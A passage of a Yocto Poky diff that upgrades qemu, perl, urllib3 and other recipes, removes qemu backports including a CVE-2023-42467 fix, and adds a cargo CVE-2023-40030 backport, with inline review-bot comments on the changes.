SRC_URI = "${SOURCEFORGE_MIRROR}/project/${BPN}/${BPN}-stable/${PV}/${BP}.tar.gz \
"
-SRC_URI[sha256sum] = "2a8eb99d71b0680c0520c7c16248cdb4195da82f396b79fea30b0d9e289c8c72"
+SRC_URI[sha256sum] = "42dc435928917fd2f847046c4a0c6086b2af23664d198c7fc1b982c0bfe600c1"
UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/log4cplus/files/log4cplus-stable/"
UPSTREAM_CHECK_REGEX = "log4cplus-stable/(?P<pver>\d+(\.\d+)+)/"
diff --git a/poky/meta/recipes-devtools/perl-cross/files/0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch b/poky/meta/recipes-devtools/perl-cross/files/0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch
deleted file mode 100644
index 4de4a5b955..0000000000
--- a/poky/meta/recipes-devtools/perl-cross/files/0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch
+++ /dev/null
@@ -1,28 +0,0 @@
-From 920abf3dc39c851a655b719622c76a6f0dc9981d Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex@linutronix.de>
-Date: Tue, 5 Sep 2023 19:47:33 +0200
-Subject: [PATCH] cnf/configure_pfmt.sh: add 32 bit integer format definitions
-
-These started to matter in perl 5.38 where they are used to print
-line numbers.
-
-Upstream-Status: Submitted [https://github.com/arsv/perl-cross/pull/143]
-Signed-off-by: Alexander Kanavin <alex@linutronix.de>
----
- cnf/configure_pfmt.sh | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/cnf/configure_pfmt.sh b/cnf/configure_pfmt.sh
-index 8f93da1..7bb4b6f 100644
---- a/cnf/configure_pfmt.sh
-+++ b/cnf/configure_pfmt.sh
-@@ -52,3 +52,9 @@ else
- define uvxformat '"lx"'
- define uvXUformat '"lX"'
- fi
-+
-+define i32dformat 'PRId32'
-+define u32uformat 'PRIu32'
-+define u32oformat 'PRIo32'
-+define u32xformat 'PRIx32'
-+define u32XUformat 'PRIX32'
diff --git a/poky/meta/recipes-devtools/perl-cross/perlcross_1.5.bb b/poky/meta/recipes-devtools/perl-cross/perlcross_1.5.2.bb
index 7ca4977b97..b41c182fad 100644
--- a/poky/meta/recipes-devtools/perl-cross/perlcross_1.5.bb
+++ b/poky/meta/recipes-devtools/perl-cross/perlcross_1.5.2.bb
@@ -15,11 +15,10 @@ SRC_URI = "${GITHUB_BASE_URI}/download/${PV}/perl-cross-${PV}.tar.gz;name=perl-c
file://0001-perl-cross-add-LDFLAGS-when-linking-libperl.patch \
file://determinism.patch \
file://0001-Makefile-check-the-file-if-patched-or-not.patch \
- file://0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch \
"
GITHUB_BASE_URI = "https://github.com/arsv/perl-cross/releases/"
-SRC_URI[perl-cross.sha256sum] = "d744a390939e2ebb9a12f6725b4d9c19255a141d90031eff90ea183fdfcbf211"
+SRC_URI[perl-cross.sha256sum] = "584dc54c48dca25e032b676a15bef377c1fed9de318b4fc140292a5dbf326e90"
S = "${WORKDIR}/perl-cross-${PV}"
diff --git a/poky/meta/recipes-devtools/perl/perl_5.38.0.bb b/poky/meta/recipes-devtools/perl/perl_5.38.2.bb
index 639664e355..a9d684cfc5 100644
--- a/poky/meta/recipes-devtools/perl/perl_5.38.0.bb
+++ b/poky/meta/recipes-devtools/perl/perl_5.38.2.bb
@@ -26,7 +26,7 @@ SRC_URI:append:class-target = " \
file://encodefix.patch \
"
-SRC_URI[perl.sha256sum] = "213ef58089d2f2c972ea353517dc60ec3656f050dcc027666e118b508423e517"
+SRC_URI[perl.sha256sum] = "a0a31534451eb7b83c7d6594a497543a54d488bc90ca00f5e34762577f40655e"
B = "${WORKDIR}/perl-${PV}-build"
diff --git a/poky/meta/recipes-devtools/python/python3-urllib3_2.0.6.bb b/poky/meta/recipes-devtools/python/python3-urllib3_2.0.7.bb
index cd2a9dd4ef..c286838086 100644
--- a/poky/meta/recipes-devtools/python/python3-urllib3_2.0.6.bb
+++ b/poky/meta/recipes-devtools/python/python3-urllib3_2.0.7.bb
@@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/shazow/urllib3"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=52d273a3054ced561275d4d15260ecda"
-SRC_URI[sha256sum] = "b19e1a85d206b56d7df1d5e683df4a7725252a964e3993648dd0fb5a1c157564"
+SRC_URI[sha256sum] = "c97dfde1f7bd43a71c8d2a58e369e9b2bf692d1334ea9f9cae55add7d0dd0f84"
inherit pypi python_hatchling
diff --git a/poky/meta/recipes-devtools/python/python3/0001-test_storlines-skip-due-to-load-variability.patch b/poky/meta/recipes-devtools/python/python3/0001-test_storlines-skip-due-to-load-variability.patch
new file mode 100644
index 0000000000..199031d42a
--- /dev/null
+++ b/poky/meta/recipes-devtools/python/python3/0001-test_storlines-skip-due-to-load-variability.patch
@@ -0,0 +1,32 @@
+From 013ff01fdf2aa6ca69a7c80a2a2996630877e4ea Mon Sep 17 00:00:00 2001
+From: Trevor Gamblin <tgamblin@baylibre.com>
+Date: Fri, 6 Oct 2023 10:59:44 -0400
+Subject: [PATCH] test_storlines: skip due to load variability
+
+This is yet another test that intermittently fails on the Yocto AB when
+a worker is under heavy load, so skip it during testing.
+
+Upstream-Status: Inappropriate [OE-Specific]
+
+[YOCTO #14933]
+
+Signed-off-by: Trevor Gamblin <tgamblin@baylibre.com>
+---
+ Lib/test/test_ftplib.py | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/Lib/test/test_ftplib.py b/Lib/test/test_ftplib.py
+index 082a90d46b..508814d56a 100644
+--- a/Lib/test/test_ftplib.py
++++ b/Lib/test/test_ftplib.py
+@@ -629,6 +629,7 @@ def test_storbinary_rest(self):
+ self.client.storbinary('stor', f, rest=r)
+ self.assertEqual(self.server.handler_instance.rest, str(r))
+
++ @unittest.skip('timing related test, dependent on load')
+ def test_storlines(self):
+ data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
+ f = io.BytesIO(data)
+--
+2.41.0
+
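Review bot: the `@unittest.skip` added above test_storlines is unconditional, so this FTP upload test loses coverage on every target, not only on loaded autobuilder workers. Consider putting the bug reference from the patch header ([YOCTO #14933]) into the skip reason string so the skip is traceable from test output. With Upstream-Status: Inappropriate, the patch also has to be re-checked by hand at each python3 upgrade.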
diff --git a/poky/meta/recipes-devtools/python/python3_3.11.5.bb b/poky/meta/recipes-devtools/python/python3_3.11.5.bb
index 8e023c7dfb..d375de4b19 100644
--- a/poky/meta/recipes-devtools/python/python3_3.11.5.bb
+++ b/poky/meta/recipes-devtools/python/python3_3.11.5.bb
@@ -33,6 +33,7 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
file://0001-Avoid-shebang-overflow-on-python-config.py.patch \
file://0001-Update-test_sysconfig-for-posix_user-purelib.patch \
file://0001-skip-no_stdout_fileno-test-due-to-load-variability.patch \
+ file://0001-test_storlines-skip-due-to-load-variability.patch \
"
SRC_URI:append:class-native = " \
diff --git a/poky/meta/recipes-devtools/qemu/qemu-native_8.1.0.bb b/poky/meta/recipes-devtools/qemu/qemu-native_8.1.2.bb
index 73a0f63f2b..73a0f63f2b 100644
--- a/poky/meta/recipes-devtools/qemu/qemu-native_8.1.0.bb
+++ b/poky/meta/recipes-devtools/qemu/qemu-native_8.1.2.bb
diff --git a/poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.0.bb b/poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.2.bb
index 558a416f7b..558a416f7b 100644
--- a/poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.0.bb
+++ b/poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.2.bb
diff --git a/poky/meta/recipes-devtools/qemu/qemu.inc b/poky/meta/recipes-devtools/qemu/qemu.inc
index 78c495516f..5ab2cb83b4 100644
--- a/poky/meta/recipes-devtools/qemu/qemu.inc
+++ b/poky/meta/recipes-devtools/qemu/qemu.inc
@@ -29,18 +29,15 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \
file://0009-Define-MAP_SYNC-and-MAP_SHARED_VALIDATE-on-needed-li.patch \
file://0010-hw-pvrdma-Protect-against-buggy-or-malicious-guest-d.patch \
file://0002-linux-user-Replace-use-of-lfs64-related-functions-an.patch \
- file://0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch \
- file://0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch \
file://fixedmeson.patch \
file://fixmips.patch \
file://qemu-guest-agent.init \
file://qemu-guest-agent.udev \
- file://CVE-2023-42467.patch \
"
UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar"
-SRC_URI[sha256sum] = "710c101198e334d4762eef65f649bc43fa8a5dd75303554b8acfec3eb25f0e55"
+SRC_URI[sha256sum] = "541526a764576eb494d2ff5ec46aeb253e62ea29035d1c23c0a8af4e6cd4f087"
SRC_URI:append:class-target = " file://cross.patch"
SRC_URI:append:class-nativesdk = " file://cross.patch"
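Review bot: three SRC_URI entries disappear here (both softmmu backports and CVE-2023-42467.patch) alongside the new sha256sum, but nothing in the hunk says that qemu 8.1.2 contains them. The deleted patch headers name upstream commits 86e4f93d827d3c1efd00cd8a906e38a2c0f2b5bc, 0d58c660689f6da1e3feff8a997014003d928b3b and 7cfcc79b0ab800959716738aff9419f53fc68c9c. The commit message should state that each is part of the 8.1.2 release, because after this change the recipe no longer carries a patch with a CVE: tag for CVE-2023-42467.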
diff --git a/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch b/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch
deleted file mode 100644
index 7380e16ab3..0000000000
--- a/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 86e4f93d827d3c1efd00cd8a906e38a2c0f2b5bc Mon Sep 17 00:00:00 2001
-From: Richard Henderson <richard.henderson@linaro.org>
-Date: Fri, 25 Aug 2023 14:06:58 -0700
-Subject: [PATCH] softmmu: Assert data in bounds in iotlb_to_section
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-Acked-by: Alex Bennée <alex.bennee@linaro.org>
-Suggested-by: Alex Bennée <alex.bennee@linaro.org>
-Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
-
-Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/86e4f93d827d3c1efd00cd8a906e38a2c0f2b5bc]
----
- softmmu/physmem.c | 10 ++++++++--
- 1 file changed, 8 insertions(+), 2 deletions(-)
-
-diff --git a/softmmu/physmem.c b/softmmu/physmem.c
-index 3df73542e1..7597dc1c39 100644
---- a/softmmu/physmem.c
-+++ b/softmmu/physmem.c
-@@ -2413,9 +2413,15 @@ MemoryRegionSection *iotlb_to_section(CPUState *cpu,
- int asidx = cpu_asidx_from_attrs(cpu, attrs);
- CPUAddressSpace *cpuas = &cpu->cpu_ases[asidx];
- AddressSpaceDispatch *d = qatomic_rcu_read(&cpuas->memory_dispatch);
-- MemoryRegionSection *sections = d->map.sections;
-+ int section_index = index & ~TARGET_PAGE_MASK;
-+ MemoryRegionSection *ret;
-+
-+ assert(section_index < d->map.sections_nb);
-+ ret = d->map.sections + section_index;
-+ assert(ret->mr);
-+ assert(ret->mr->ops);
-
-- return &sections[index & ~TARGET_PAGE_MASK];
-+ return ret;
- }
-
- static void io_mem_init(void)
---
-2.34.1
-
diff --git a/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch b/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch
deleted file mode 100644
index 8289b45991..0000000000
--- a/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch
+++ /dev/null
@@ -1,157 +0,0 @@
-From 0d58c660689f6da1e3feff8a997014003d928b3b Mon Sep 17 00:00:00 2001
-From: Richard Henderson <richard.henderson@linaro.org>
-Date: Fri, 25 Aug 2023 16:13:17 -0700
-Subject: [PATCH] softmmu: Use async_run_on_cpu in tcg_commit
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-After system startup, run the update to memory_dispatch
-and the tlb_flush on the cpu. This eliminates a race,
-wherein a running cpu sees the memory_dispatch change
-but has not yet seen the tlb_flush.
-
-Since the update now happens on the cpu, we need not use
-qatomic_rcu_read to protect the read of memory_dispatch.
-
-Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1826
-Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1834
-Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1846
-Tested-by: Alex Bennée <alex.bennee@linaro.org>
-Reviewed-by: Alex Bennée <alex.bennee@linaro.org>
-Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
-
-Upstream-Status: Backport [0d58c660689f6da1e3feff8a997014003d928b3b]
----
- accel/tcg/cpu-exec-common.c | 30 ----------------------------
- include/exec/cpu-common.h | 1 -
- softmmu/physmem.c | 40 +++++++++++++++++++++++++++----------
- 3 files changed, 29 insertions(+), 42 deletions(-)
-
-Index: qemu-8.1.0/accel/tcg/cpu-exec-common.c
-===================================================================
---- qemu-8.1.0.orig/accel/tcg/cpu-exec-common.c
-+++ qemu-8.1.0/accel/tcg/cpu-exec-common.c
-@@ -33,36 +33,6 @@ void cpu_loop_exit_noexc(CPUState *cpu)
- cpu_loop_exit(cpu);
- }
-
--#if defined(CONFIG_SOFTMMU)
--void cpu_reloading_memory_map(void)
--{
-- if (qemu_in_vcpu_thread() && current_cpu->running) {
-- /* The guest can in theory prolong the RCU critical section as long
-- * as it feels like. The major problem with this is that because it
-- * can do multiple reconfigurations of the memory map within the
-- * critical section, we could potentially accumulate an unbounded
-- * collection of memory data structures awaiting reclamation.
-- *
-- * Because the only thing we're currently protecting with RCU is the
-- * memory data structures, it's sufficient to break the critical section
-- * in this callback, which we know will get called every time the
-- * memory map is rearranged.
-- *
-- * (If we add anything else in the system that uses RCU to protect
-- * its data structures, we will need to implement some other mechanism
-- * to force TCG CPUs to exit the critical section, at which point this
-- * part of this callback might become unnecessary.)
-- *
-- * This pair matches cpu_exec's rcu_read_lock()/rcu_read_unlock(), which
-- * only protects cpu->as->dispatch. Since we know our caller is about
-- * to reload it, it's safe to split the critical section.
-- */
-- rcu_read_unlock();
-- rcu_read_lock();
-- }
--}
--#endif
--
- void cpu_loop_exit(CPUState *cpu)
- {
- /* Undo the setting in cpu_tb_exec. */
-Index: qemu-8.1.0/include/exec/cpu-common.h
-===================================================================
---- qemu-8.1.0.orig/include/exec/cpu-common.h
-+++ qemu-8.1.0/include/exec/cpu-common.h
-@@ -133,7 +133,6 @@ static inline void cpu_physical_memory_w
- {
- cpu_physical_memory_rw(addr, (void *)buf, len, true);
- }
--void cpu_reloading_memory_map(void);
- void *cpu_physical_memory_map(hwaddr addr,
- hwaddr *plen,
- bool is_write);
-Index: qemu-8.1.0/softmmu/physmem.c
-===================================================================
---- qemu-8.1.0.orig/softmmu/physmem.c
-+++ qemu-8.1.0/softmmu/physmem.c
-@@ -680,8 +680,7 @@ address_space_translate_for_iotlb(CPUSta
- IOMMUTLBEntry iotlb;
- int iommu_idx;
- hwaddr addr = orig_addr;
-- AddressSpaceDispatch *d =
-- qatomic_rcu_read(&cpu->cpu_ases[asidx].memory_dispatch);
-+ AddressSpaceDispatch *d = cpu->cpu_ases[asidx].memory_dispatch;
-
- for (;;) {
- section = address_space_translate_internal(d, addr, &addr, plen, false);
-@@ -2412,7 +2411,7 @@ MemoryRegionSection *iotlb_to_section(CP
- {
- int asidx = cpu_asidx_from_attrs(cpu, attrs);
- CPUAddressSpace *cpuas = &cpu->cpu_ases[asidx];
-- AddressSpaceDispatch *d = qatomic_rcu_read(&cpuas->memory_dispatch);
-+ AddressSpaceDispatch *d = cpuas->memory_dispatch;
- int section_index = index & ~TARGET_PAGE_MASK;
- MemoryRegionSection *ret;
-
-@@ -2487,23 +2486,42 @@ static void tcg_log_global_after_sync(Me
- }
- }
-
-+static void tcg_commit_cpu(CPUState *cpu, run_on_cpu_data data)
-+{
-+ CPUAddressSpace *cpuas = data.host_ptr;
-+
-+ cpuas->memory_dispatch = address_space_to_dispatch(cpuas->as);
-+ tlb_flush(cpu);
-+}
-+
- static void tcg_commit(MemoryListener *listener)
- {
- CPUAddressSpace *cpuas;
-- AddressSpaceDispatch *d;
-+ CPUState *cpu;
-
- assert(tcg_enabled());
- /* since each CPU stores ram addresses in its TLB cache, we must
- reset the modified entries */
- cpuas = container_of(listener, CPUAddressSpace, tcg_as_listener);
-- cpu_reloading_memory_map();
-- /* The CPU and TLB are protected by the iothread lock.
-- * We reload the dispatch pointer now because cpu_reloading_memory_map()
-- * may have split the RCU critical section.
-+ cpu = cpuas->cpu;
-+
-+ /*
-+ * Defer changes to as->memory_dispatch until the cpu is quiescent.
-+ * Otherwise we race between (1) other cpu threads and (2) ongoing
-+ * i/o for the current cpu thread, with data cached by mmu_lookup().
-+ *
-+ * In addition, queueing the work function will kick the cpu back to
-+ * the main loop, which will end the RCU critical section and reclaim
-+ * the memory data structures.
-+ *
-+ * That said, the listener is also called during realize, before
-+ * all of the tcg machinery for run-on is initialized: thus halt_cond.
- */
-- d = address_space_to_dispatch(cpuas->as);
-- qatomic_rcu_set(&cpuas->memory_dispatch, d);
-- tlb_flush(cpuas->cpu);
-+ if (cpu->halt_cond) {
-+ async_run_on_cpu(cpu, tcg_commit_cpu, RUN_ON_CPU_HOST_PTR(cpuas));
-+ } else {
-+ tcg_commit_cpu(cpu, RUN_ON_CPU_HOST_PTR(cpuas));
-+ }
- }
-
- static void memory_map_init(void)
diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2023-42467.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2023-42467.patch
deleted file mode 100644
index 86ab7cf81a..0000000000
--- a/poky/meta/recipes-devtools/qemu/qemu/CVE-2023-42467.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 7cfcc79b0ab800959716738aff9419f53fc68c9c Mon Sep 17 00:00:00 2001
-From: Thomas Huth <thuth@redhat.com>
-Date: Thu, 5 Oct 2023 06:01:10 +0000
-Subject: [PATCH] hw/scsi/scsi-disk: Disallow block sizes smaller than 512
- [CVE-2023-42467]
-
-We are doing things like
-
- nb_sectors /= (s->qdev.blocksize / BDRV_SECTOR_SIZE);
-
-in the code here (e.g. in scsi_disk_emulate_mode_sense()), so if
-the blocksize is smaller than BDRV_SECTOR_SIZE (=512), this crashes
-with a division by 0 exception. Thus disallow block sizes of 256
-bytes to avoid this situation.
-
-Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1813
-CVE: 2023-42467
-Signed-off-by: Thomas Huth <thuth@redhat.com>
-Message-ID: <20230925091854.49198-1-thuth@redhat.com>
-Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
-
-CVE: CVE-2023-42467
-
-Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/7cfcc79b0ab800959716738aff9419f53fc68c9c]
-
-Signed-off-by: Yogita Urade <yogita.urade@windriver.com>
----
- hw/scsi/scsi-disk.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/hw/scsi/scsi-disk.c b/hw/scsi/scsi-disk.c
-index e0d79c796..477ee2bcd 100644
---- a/hw/scsi/scsi-disk.c
-+++ b/hw/scsi/scsi-disk.c
-@@ -1628,9 +1628,10 @@ static void scsi_disk_emulate_mode_select(SCSIDiskReq *r, uint8_t *inbuf)
- * Since the existing code only checks/updates bits 8-15 of the block
- * size, restrict ourselves to the same requirement for now to ensure
- * that a block size set by a block descriptor and then read back by
-- * a subsequent SCSI command will be the same
-+ * a subsequent SCSI command will be the same. Also disallow a block
-+ * size of 256 since we cannot handle anything below BDRV_SECTOR_SIZE.
- */
-- if (bs && !(bs & ~0xff00) && bs != s->qdev.blocksize) {
-+ if (bs && !(bs & ~0xfe00) && bs != s->qdev.blocksize) {
- s->qdev.blocksize = bs;
- trace_scsi_disk_mode_select_set_blocksize(s->qdev.blocksize);
- }
---
-2.40.0
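Review bot: deleting this backport is only correct if the unpacked 8.1.2 source already has the tightened mask in scsi_disk_emulate_mode_select(), that is `!(bs & ~0xfe00)` rather than `!(bs & ~0xff00)`. With the old mask a block size of 256 is accepted and `s->qdev.blocksize / BDRV_SECTOR_SIZE` evaluates to 0, which is the division by zero the patch description reports. Checking hw/scsi/scsi-disk.c in the unpacked source for the `0xfe00` mask would confirm the guard survived the upgrade.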
diff --git a/poky/meta/recipes-devtools/qemu/qemu_8.1.0.bb b/poky/meta/recipes-devtools/qemu/qemu_8.1.2.bb
index 84ee0bcc49..84ee0bcc49 100644
--- a/poky/meta/recipes-devtools/qemu/qemu_8.1.0.bb
+++ b/poky/meta/recipes-devtools/qemu/qemu_8.1.2.bb
diff --git a/poky/meta/recipes-devtools/rust/files/0002-CVE-2023-40030.patch b/poky/meta/recipes-devtools/rust/files/0002-CVE-2023-40030.patch
new file mode 100644
index 0000000000..bf9b251226
--- /dev/null
+++ b/poky/meta/recipes-devtools/rust/files/0002-CVE-2023-40030.patch
@@ -0,0 +1,412 @@
+Author: Eric Huss <eric@huss.org>
+Date: Sun Jun 11 12:52:25 2023 -0700
+
+ Convert valid feature name warning to an error.
+
+Upstream-Status: Backport [https://github.com/rust-lang/cargo/commit/9835622853f08be9a4b58ebe29dcec8f43b64b33]
+CVE: CVE-2023-40030
+Signed-off-by: Deepthi Hemraj <Deepthi.Hemraj@windriver.com>
+
+diff --git a/src/tools/cargo/crates/resolver-tests/src/lib.rs b/src/tools/cargo/crates/resolver-tests/src/lib.rs
+index 01d9b5e6d..ab34e8663 100644
+--- a/src/tools/cargo/crates/resolver-tests/src/lib.rs
++++ b/src/tools/cargo/crates/resolver-tests/src/lib.rs
+@@ -179,7 +179,6 @@ pub fn resolve_with_config_raw(
+ used: HashSet::new(),
+ };
+ let summary = Summary::new(
+- config,
+ pkg_id("root"),
+ deps,
+ &BTreeMap::new(),
+@@ -581,7 +580,6 @@ pub fn pkg_dep<T: ToPkgId>(name: T, dep: Vec<Dependency>) -> Summary {
+ None
+ };
+ Summary::new(
+- &Config::default().unwrap(),
+ name.to_pkgid(),
+ dep,
+ &BTreeMap::new(),
+@@ -610,7 +608,6 @@ pub fn pkg_loc(name: &str, loc: &str) -> Summary {
+ None
+ };
+ Summary::new(
+- &Config::default().unwrap(),
+ pkg_id_loc(name, loc),
+ Vec::new(),
+ &BTreeMap::new(),
+@@ -625,7 +622,6 @@ pub fn remove_dep(sum: &Summary, ind: usize) -> Summary {
+ deps.remove(ind);
+ // note: more things will need to be copied over in the future, but it works for now.
+ Summary::new(
+- &Config::default().unwrap(),
+ sum.package_id(),
+ deps,
+ &BTreeMap::new(),
+diff --git a/src/tools/cargo/src/cargo/core/resolver/version_prefs.rs b/src/tools/cargo/src/cargo/core/resolver/version_prefs.rs
+index 002f11ff8..bf26d0498 100644
+--- a/src/tools/cargo/src/cargo/core/resolver/version_prefs.rs
++++ b/src/tools/cargo/src/cargo/core/resolver/version_prefs.rs
+@@ -73,7 +73,6 @@ impl VersionPreferences {
+ mod test {
+ use super::*;
+ use crate::core::SourceId;
+- use crate::util::Config;
+ use std::collections::BTreeMap;
+
+ fn pkgid(name: &str, version: &str) -> PackageId {
+@@ -90,9 +89,8 @@ mod test {
+
+ fn summ(name: &str, version: &str) -> Summary {
+ let pkg_id = pkgid(name, version);
+- let config = Config::default().unwrap();
+ let features = BTreeMap::new();
+- Summary::new(&config, pkg_id, Vec::new(), &features, None::<&String>).unwrap()
++ Summary::new(pkg_id, Vec::new(), &features, None::<&String>).unwrap()
+ }
+
+ fn describe(summaries: &Vec<Summary>) -> String {
+
+diff --git a/src/tools/cargo/src/cargo/core/summary.rs b/src/tools/cargo/src/cargo/core/summary.rs
+index 2535c4482..1883df33b 100644
+--- a/src/tools/cargo/src/cargo/core/summary.rs
++++ b/src/tools/cargo/src/cargo/core/summary.rs
+@@ -1,6 +1,6 @@
+ use crate::core::{Dependency, PackageId, SourceId};
+ use crate::util::interning::InternedString;
+-use crate::util::{CargoResult, Config};
++use crate::util::CargoResult;
+ use anyhow::bail;
+ use semver::Version;
+ use std::collections::{BTreeMap, HashMap, HashSet};
+@@ -30,7 +30,6 @@ struct Inner {
+
+ impl Summary {
+ pub fn new(
+- config: &Config,
+ pkg_id: PackageId,
+ dependencies: Vec<Dependency>,
+ features: &BTreeMap<InternedString, Vec<InternedString>>,
+@@ -49,7 +48,7 @@ impl Summary {
+ )
+ }
+ }
+- let feature_map = build_feature_map(config, pkg_id, features, &dependencies)?;
++ let feature_map = build_feature_map(pkg_id, features, &dependencies)?;
+ Ok(Summary {
+ inner: Rc::new(Inner {
+ package_id: pkg_id,
+@@ -140,7 +139,6 @@ impl Hash for Summary {
+ /// Checks features for errors, bailing out a CargoResult:Err if invalid,
+ /// and creates FeatureValues for each feature.
+ fn build_feature_map(
+- config: &Config,
+ pkg_id: PackageId,
+ features: &BTreeMap<InternedString, Vec<InternedString>>,
+ dependencies: &[Dependency],
+@@ -204,7 +202,7 @@ fn build_feature_map(
+ feature
+ );
+ }
+- validate_feature_name(config, pkg_id, feature)?;
++ validate_feature_name(pkg_id, feature)?;
+ for fv in fvs {
+ // Find data for the referenced dependency...
+ let dep_data = {
+@@ -431,33 +429,63 @@ impl fmt::Display for FeatureValue {
+
+ pub type FeatureMap = BTreeMap<InternedString, Vec<FeatureValue>>;
+
+-fn validate_feature_name(config: &Config, pkg_id: PackageId, name: &str) -> CargoResult<()> {
++fn validate_feature_name(pkg_id: PackageId, name: &str) -> CargoResult<()> {
+ let mut chars = name.chars();
+- const FUTURE: &str = "This was previously accepted but is being phased out; \
+- it will become a hard error in a future release.\n\
+- For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, \
+- and please leave a comment if this will be a problem for your project.";
+ if let Some(ch) = chars.next() {
+ if !(unicode_xid::UnicodeXID::is_xid_start(ch) || ch == '_' || ch.is_digit(10)) {
+- config.shell().warn(&format!(
++ bail!(
+ "invalid character `{}` in feature `{}` in package {}, \
+ the first character must be a Unicode XID start character or digit \
+- (most letters or `_` or `0` to `9`)\n\
+- {}",
+- ch, name, pkg_id, FUTURE
+- ))?;
++ (most letters or `_` or `0` to `9`)",
++ ch,
++ name,
++ pkg_id
++ );
+ }
+ }
+ for ch in chars {
+ if !(unicode_xid::UnicodeXID::is_xid_continue(ch) || ch == '-' || ch == '+' || ch == '.') {
+- config.shell().warn(&format!(
++ bail!(
+ "invalid character `{}` in feature `{}` in package {}, \
+ characters must be Unicode XID characters, `+`, or `.` \
+- (numbers, `+`, `-`, `_`, `.`, or most letters)\n\
+- {}",
+- ch, name, pkg_id, FUTURE
+- ))?;
++ (numbers, `+`, `-`, `_`, `.`, or most letters)",
++ ch,
++ name,
++ pkg_id
++ );
+ }
+ }
+ Ok(())
+ }
++
++#[cfg(test)]
++mod tests {
++ use super::*;
++ use crate::sources::CRATES_IO_INDEX;
++ use crate::util::into_url::IntoUrl;
++
++ use crate::core::SourceId;
++
++ #[test]
++ fn valid_feature_names() {
++ let loc = CRATES_IO_INDEX.into_url().unwrap();
++ let source_id = SourceId::for_registry(&loc).unwrap();
++ let pkg_id = PackageId::new("foo", "1.0.0", source_id).unwrap();
++
++ assert!(validate_feature_name(pkg_id, "c++17").is_ok());
++ assert!(validate_feature_name(pkg_id, "128bit").is_ok());
++ assert!(validate_feature_name(pkg_id, "_foo").is_ok());
++ assert!(validate_feature_name(pkg_id, "feat-name").is_ok());
++ assert!(validate_feature_name(pkg_id, "feat_name").is_ok());
++ assert!(validate_feature_name(pkg_id, "foo.bar").is_ok());
++
++ assert!(validate_feature_name(pkg_id, "+foo").is_err());
++ assert!(validate_feature_name(pkg_id, "-foo").is_err());
++ assert!(validate_feature_name(pkg_id, ".foo").is_err());
++ assert!(validate_feature_name(pkg_id, "foo:bar").is_err());
++ assert!(validate_feature_name(pkg_id, "foo?").is_err());
++ assert!(validate_feature_name(pkg_id, "?foo").is_err());
++ assert!(validate_feature_name(pkg_id, "ⒶⒷⒸ").is_err());
++ assert!(validate_feature_name(pkg_id, "a¼").is_err());
++ }
++}
+diff --git a/src/tools/cargo/src/cargo/sources/registry/index.rs b/src/tools/cargo/src/cargo/sources/registry/index.rs
+index aa5c2a78c..6d565da8f 100644
+--- a/src/tools/cargo/src/cargo/sources/registry/index.rs
++++ b/src/tools/cargo/src/cargo/sources/registry/index.rs
+@@ -293,7 +293,6 @@ impl<'cfg> RegistryIndex<'cfg>
+ 'a: 'b,
+ {
+ let source_id = self.source_id;
+- let config = self.config;
+
+ // First up actually parse what summaries we have available. If Cargo
+ // has run previously this will parse a Cargo-specific cache file rather
+@@ -312,15 +311,13 @@ impl<'cfg> RegistryIndex<'cfg> {
+ .versions
+ .iter_mut()
+ .filter_map(move |(k, v)| if req.matches(k) { Some(v) } else { None })
+- .filter_map(
+- move |maybe| match maybe.parse(config, raw_data, source_id) {
++ .filter_map(move |maybe| match maybe.parse(raw_data, source_id) {
+ Ok(summary) => Some(summary),
+ Err(e) => {
+ info!("failed to parse `{}` registry package: {}", name, e);
+ None
+ }
+- },
+- )
++ })
+ .filter(move |is| {
+ if is.v > INDEX_V_MAX {
+ debug!(
+@@ -605,7 +602,7 @@ impl Summaries {
